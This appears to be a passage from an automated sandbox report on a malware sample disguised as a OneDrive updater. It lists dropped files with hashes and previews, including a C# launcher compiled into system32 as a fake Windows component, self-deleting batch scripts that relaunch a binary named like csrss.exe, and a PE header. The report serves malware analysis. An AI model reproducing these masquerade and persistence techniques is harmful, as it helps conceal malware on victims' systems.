SHA1:	2145C09D2C3279AC83E844C4D80E7AA219E99B8D
SHA-256:	1054AF5E9206AA0CB650A4E58900BCD369A554E64EAA89F56CB35CD105386EB5
SHA-512:	6AF6336782B29BDAB906E4D289CB5C2C8500BA8A20DEE53DEF21960E62AFC28EC6756B746B4E4036A30726984A60B656B3D529B4ABC119953267E91BE4992A4D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f............................N.... ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc... .... ......................@..@.reloc.......@......................@..B................0.......H.......X....@......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\Public\MjlsqDcSPlv.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Public\ef091392c4842d

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	ASCII text, with very long lines (383), with no line terminators
Category:	dropped
Size (bytes):	383
Entropy (8bit):	5.849108902329598
Encrypted:	false
SSDEEP:	6:zvqHMR10D6oVnzFnwiPkECc2qrchFJQlnxKzmYOyQKsWSUjdZITh7xg1TZTXyn:zv8fDUiPk827bJQlx8zO6jdm9aZDO
MD5:	4E9366B34EFE1B16B77490B25B5F5BA9
SHA1:	16F040E2A8A12421272DF54ACCC91AE8689069BA
SHA-256:	8255080A54497C8813F85A6C7FFE7CBB3A29B8BC0CA5140D93C6539B28322425
SHA-512:	1430B08DBBF93998D4AA28F99DB8AC4EC7197D3773AE7BECCD601657A3E5D05C615F2A0014C1A93914F474212E28758FA437086CD698C5CE9E3BAC72A79FE841
Malicious:	false
Preview:	6qmKNV1incdDxGZatpUtQLWbLQWgh86xciDj3CdXIRpGnsxkM6LHwIHvUL879UBpfqlPC0hqL7l9gPxdcwUlwzBUbSOrDgYxP9k6HihWYe6zgHOEXfeNAa2qpQxulznoixtgo1W4O8MS2LxTDJUiCKxzH4Q0vwui1RQtYsZfIk8CNjxdddrbfFmYA3YukfIbNnbl5E5UuyZbMulhGxXRFSDvp2seTp5nbhykIMiZiWrqqLLPS0nxI1W4kp5DVaBE3v9o5BZ4O8sslWFdqcMcCHfkK39cQeDIVnx4LhTRbtiJInTOkbW2NiCvQZeBB6nu4kW7iKSJJ5BTjVbhku1yHL4xlCovDSPfFyOiQWpaJNtShtM486bREymtpjWgfgG

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MjlsqDcSPlv.exe.log

Download File

Process:	C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OneDriveStandaloneUpdater.exe.log

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	2041
Entropy (8bit):	5.374034001672589
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKktVTqZ4vb
MD5:	553B6EF1B0572462CC8BF3E338B09385
SHA1:	11BBCF871361CC815C2261F2A6A4230DC88D5993
SHA-256:	58AF346985F4101CBCBB7F2E6269A3E1A5C523B8C121EC7E79F445CB03CDECCE
SHA-512:	CA38CEABE6E4425D67B599EADF775A2626A5DCB5B2C956B88349FAB257A98678215C6A9C4E8139799C4FFD7043FF74DC71C0B7556ABB120BCB6589B2023B57CA
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\csrss.exe.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1824
Entropy (8bit):	5.3789451538423645
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktVTqZ4x
MD5:	761E9A94BB204F5F90E83F605B9B1612
SHA1:	5C124FB012E33D65CE30D0CDE1BF8FFEB3631A40
SHA-256:	AC1C6452993CE7B569933BFB39E5069F7899FFC7A98B3D1C199244C0BA1C2068
SHA-512:	130A4CD2E76B7DD1683BE30455ABF11896B474ADEAC4D510FBED05C68174AF4E36B2DE196D67FB367CBBA6697299C8B4941F0ACA67766DA3AAF975463B24F29E
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllultnxj:NllU
MD5:	F93358E626551B46E6ED5A0A9D29BD51
SHA1:	9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
SHA-256:	0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
SHA-512:	D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\0axxRKsKbJ

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.483856189774723
Encrypted:	false
SSDEEP:	3:Aiu3c3Cti:Ai4WCQ
MD5:	7B9AFF96F97EC60EE46040F93DC44EFD
SHA1:	FB4DB5354C5DA898093FF054DCBF2CE97C7BC382
SHA-256:	530B3FD019B298FE0BF9D257D2E363799930DFBC4844F480CA61359ECE47946C
SHA-512:	14F81A60FDF85B48FF65E75C25EF087A616A3E011167181124D431BF2D5433C93F1B012B78E6ECE739B31A618650D06894B4240A5D2450D2EEB6FB0ED95FD06D
Malicious:	false
Preview:	MxUp7fazY1qRyS3T3Umj2c4OG

C:\Users\user\AppData\Local\Temp\3caoicbj\3caoicbj.0.cs

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	385
Entropy (8bit):	4.870418093843251
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL2owsiFkD:JNVQIbSfhV7TiFkMSfhKowJFkD
MD5:	203296D12353F54EE10D2AAA20DA46EE
SHA1:	894EA876D45233C0600645BBE1E767F6AF3CFA0B
SHA-256:	C144ED66B505D5C741CED09B305FE1EA524F0BA3ECE1D9A81379A79BF5D5F7B9
SHA-512:	571B0BD6E0B4300267B2EE9A91337DF0FED5C8DF5F13B72BC34367E87C53CBBD8A23DF7838D85E7348543907EEEFAB25E0F1BF3790C4F46BA46433CE4FD5860D
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\All Users\Documents\csrss.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\3caoicbj\3caoicbj.cmdline

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	254
Entropy (8bit):	5.086029440445865
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23fWXg3:Hu7L//TRq79cQlZGg
MD5:	821A44B0E345E0F4E9D1A2C803593DEA
SHA1:	0738FBFCE0200D91E95B67C01D17F8C9F99A0C7C
SHA-256:	F78BD45B8287634A3A014AA80CF210C70B6094F37A3DB8C9E98C4A25F762C933
SHA-512:	3E41740B42110AA4B079B2B65786FCC46DBD744EECA36A41F21BA2B4A340EE93DA84FFD9CB992DAD2055042E554073EEF91968C652270953D5D46944B12A12D8
Malicious:	false
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\3caoicbj\3caoicbj.0.cs"

C:\Users\user\AppData\Local\Temp\3caoicbj\3caoicbj.out

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (337), with CRLF, CR line terminators
Category:	modified
Size (bytes):	758
Entropy (8bit):	5.248774047169813
Encrypted:	false
SSDEEP:	12:Ka/I/u7L//TRq79cQlZGVKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KwI/un/Vq79tDGVKax5DqBVKVrdFAMBt
MD5:	F59A38F9C89B5DB8BC375A1406706645
SHA1:	37D8C300A17F5B519512609325AB803345DC838B
SHA-256:	CCEF2DF764B4EAB3FAC1E858213333AEB59BBF62978F10619FA61763D5157254
SHA-512:	C656533364265542755D4EED01CD908CA963EA5D64208CDC2C34D5CCC3A25C184238E3CB8B5AC02E66DB1C50933D5A210B646448EBC208145217D43A3B3E4174
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\3caoicbj\3caoicbj.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\49x50b8mpj

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:d3x/pgC2:d3B2
MD5:	111481A442E58C5930D0463F8BF8DC9E
SHA1:	4D7A3C450903494C8B40E737F7210EE007544A57
SHA-256:	4BC2905BAA0B0287B081333A6F7982FDEBC872A8CBAEBAD55B0F50C70143759F
SHA-512:	911DADCA884DC9FF6AE201620822E948231C7987C305DF5B7688378BB4A273BA652D685D0A6C2A0E43F0AD03FE20E432BA84CB89CF77C384C680DEFB5F5F8F38
Malicious:	false
Preview:	QYTLRDt4zt2Q1OPcEGCSf6vKD

C:\Users\user\AppData\Local\Temp\4wM4wqHWVF.bat

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.10234671709816
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1IDcoAl+z0CIvBktKcKZG10nacwRE2J5xAIPRnjH:hCRLuVFOOr+DE1IDcoAO0BvKOZG1cNwj
MD5:	825568172015B0FFDF88F4CF89C177FE
SHA1:	1B052AC3651EE33EAE2EC36695DECA9153C18165
SHA-256:	2A620066CCCAA1774B53A8AD00596776EBE1FECB299B6BDDEAC16392154B8172
SHA-512:	B051CD97833B149008B2C05C68262F7B51A42392F14E9A30143F10A880687DBB942208D4CC1109E071DE6D68A983AA2373D69B7DDEC6333B07E06D04E140A6E6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\All Users\Documents\csrss.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\4wM4wqHWVF.bat"

C:\Users\user\AppData\Local\Temp\Bvb00ndIHg

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774723
Encrypted:	false
SSDEEP:	3:ywfQ227qr:yO2ur
MD5:	94EBF4B8872300DFA7E89605FB117DE7
SHA1:	62FEE01DF08F9BFF899BC073591A446A85325A37
SHA-256:	FA3EAB8CAEC791F69C49E04AEAD64AD4C3EA691900677E4E34A16305239295B3
SHA-512:	B125A4670C515E1747D89E9736B5721067EEC6748BAEAC663F8ECD5A3868E65A64D7E1EC6B2D9884C75FA7AC9A576E4B4309ECAD6698B8A4A21F60DE66393BA7
Malicious:	false
Preview:	HvNoJ7fSqVxvDUiUocs3TKQON

C:\Users\user\AppData\Local\Temp\GogtzRNUlL.bat

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.018284016306236
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1IDcoAl+z0CIvBktKcKZG10nacwRE2J5xAISRHn:hCRLuVFOOr+DE1IDcoAO0BvKOZG1cNwK
MD5:	6969E8331E17359CF6921B367433D0AF
SHA1:	92865E8C0F2F3E6FE605E093F536A821825C931D
SHA-256:	1CDE806504D49BD7EC210550F50424F5DDE817DF4DE18BCAACEBB6D5FE4A038F
SHA-512:	50FBFD767D73A4E628A6D6B4A7F10DFF4704D489E195C673CB357AF391C7F9C5933C52A52BF4A0FA45925C298C069728BB69C32BCFEAA9B0A27EBE0DAADEEE8C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\All Users\Documents\csrss.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\GogtzRNUlL.bat"

C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	174
Entropy (8bit):	5.205022766704434
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m10naIh2PJNTSBktKcKZG10nacwRE2J5xAIgHn:hCRLuVFOOr+DE1cW5SKOZG1cNwi23fCn
MD5:	7F559BB9C5AF2E0A8A77D024FCF5172F
SHA1:	85ED6DEC1C0E5247AA36B1FA825768D1CC38D8E0
SHA-256:	2159012EB6CAB84F2A5F7E3BD98ADAAE7F7370CD10AA707979E9E8CCD9CA87A7
SHA-512:	CDE49CEFCDF092C2182D30AB4FA7CE6916987FA358A980C29FF292AC3273F76BBE977FAE3B3FC86E7B0350ACF8509171A4A13D3707007DB332793A5F9595C067
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\NetHood\MjlsqDcSPlv.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\HSh65PBXsw.bat"

C:\Users\user\AppData\Local\Temp\MCv5EqkMBH.bat

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	218
Entropy (8bit):	5.059566986061
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1IDcoAO0BvKOZG1cNwi23fp14nZ4H:HTg9uYDEhowYZh1qs
MD5:	BA1A92355A82970B9E9E6FDE405EF9E2
SHA1:	82488DA5736AF2E4AEC750F74FDB610DC1598A21
SHA-256:	99B5922D083A47054D21B6B8431DEFEC3CA0724C1B5A052B05FEE6C11FC568CA
SHA-512:	0801A4798456D389479FBDAA9B22074C80258589E16131E075CB9264FBEC83940717C5A6F59DC986EF4DE7E762E047FD23111A9901414C9EBF2D77DA2B13FF76
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\All Users\Documents\csrss.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\MCv5EqkMBH.bat"

C:\Users\user\AppData\Local\Temp\MYvr7swJ3g.bat

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.07094105813905
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1IDcoAl+z0CIvBktKcKZG10nacwRE2J5xAIMLHERH:hCRLuVFOOr+DE1IDcoAO0BvKOZG1cNwV
MD5:	98FB098972B0B0B719C1EBA615A2E327
SHA1:	3E7F667E732BEFE7E22F009EAA559E1DF81FD071
SHA-256:	526E77BDE3B03ECD1A04602AF9DE8556E49BE5C43BBE922C2A7362E3903CAD9B
SHA-512:	70AB342A1E8A42A0841FC544003A06718AF60AFD26BBDD4D994F6D0DE71613E7765CB154CBB7CA67786EA90C04B3067BA296CF516EF402CC8F4040BBDBB64494
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\All Users\Documents\csrss.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\MYvr7swJ3g.bat"

C:\Users\user\AppData\Local\Temp\RES197D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d4, 10 symbols, created Mon Jan 13 12:55:12 2025, 1st section name ".debug$S"
Category:	modified
Size (bytes):	1932
Entropy (8bit):	4.61165872841295
Encrypted:	false
SSDEEP:	48:mkLz04aZ7KOZm6lmuulB+hnqXSfbNtmh5N:tnzEKOc62TkZzNty5N
MD5:	A18DB7F5B8847380698EB73DEC558266
SHA1:	F8736BA218280FA59E093CC86B52B1CD379DFBD3
SHA-256:	C6A19FD5DEBAFC6543F9191C49A710CA7619B777F16FD05B692E13E22ED238AC
SHA-512:	31C1DF854E4B9EA8C90283DC5D949A56CF8E86D5EFF6A59EACF7101CF74A2679D4656115E1EBB1B3FE94670B220FFD8972FF3589C19FB37474D4948F9B241543
Malicious:	false
Preview:	L...0..g.............debug$S........\...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Y....c:\Program Files (x86)\Microsoft\Edge\Application\CSC4C6AACF3DD740FF943F213646D3DC0.TMP......................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RES197D.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.

C:\Users\user\AppData\Local\Temp\RES1C5B.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6f0, 10 symbols, created Mon Jan 13 12:55:13 2025, 1st section name ".debug$S"
Category:	modified
Size (bytes):	1960
Entropy (8bit):	4.566887650519401
Encrypted:	false
SSDEEP:	24:HzjS9YIOMK/YZHiwKOZmN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+GUZ:XhnYZZKOZmyluOulajfqXSfbNtmhxZ
MD5:	4EFC73459336D6E497444A54D2823A44
SHA1:	ED06DC104FE7BD0708C940EE8EE5BD0EA7BA66DA
SHA-256:	07360537E833AEC1FC1F5A27EBCA3483528593586AA8874B11C75C7E851F130E
SHA-512:	9F1C092631081DC1A5E70492572EAA492E542D639BE5A24DDA7BF3E17E2DA39208D3B52377236BC89E909244D006D7C416AF5FD58B877A3F366FF146CA0DB260
Malicious:	false
Preview:	L...1..g.............debug$S........@...................@..B.rsrc$01................l...........@..@.rsrc$02........p...................@..@........=....c:\Windows\System32\CSC4209A55E9E1C448293632CEEB8D0515F.TMP.....................r.av..t.y..............7.......C:\Users\user~1\AppData\Local\Temp\RES1C5B.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.

C:\Users\user\AppData\Local\Temp\T7zpOYzElC.bat

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	188
Entropy (8bit):	5.087112666438552
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m10naRRqLEcTGOJKLAgDIBktKcKZG10nacwRE2J5xd:hCRLuVFOOr+DE1cSRqLzTGOJVg0KOZG7
MD5:	FD25EAEF75CE89AD846916A45B9A91A6
SHA1:	DF4F17A9A433D512B05CB3F6B942A2A2E079F1BD
SHA-256:	EB2DD0D9070EC2887738A3225C89D21739E38E60B84DFCF833ACD07535EA4F4B
SHA-512:	1C441AE5A0AFA2D186F859B43422659998D0CADD64C9823CB7F263CB73824CA12319F079A3F0C653D4C415B74C8C3471D92B02C69D9CAF02012CF1B1DADF79C8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\T7zpOYzElC.bat"

C:\Users\user\AppData\Local\Temp\VzpByHn75i.bat

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	174
Entropy (8bit):	5.228785981497244
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m10naIh2PJNTSBktKcKZG10nacwRE2J5xAIBVn6vn:hCRLuVFOOr+DE1cW5SKOZG1cNwi23fBY
MD5:	3C143BB157B8EB28AA151692BF1B8094
SHA1:	E5A2B2AFBA4C8B1F6EA3D009E9ED344EA511153E
SHA-256:	98188B1EE1B6617239370CC4BAD13F18E68BED399CE89A188E8330FE6820CA54
SHA-512:	F0CE3E25DD8C8E55775875A1480EBD8F23BD0206CE8E18B520C484F10EDF62D3D2662539D81DC7D49A29C3C8CBE46C3D8851AC2684FE22C11C0423345F6CB390
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\NetHood\MjlsqDcSPlv.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\VzpByHn75i.bat"

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ffyq3ov.mmw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3bkj40hi.kp5.ps1

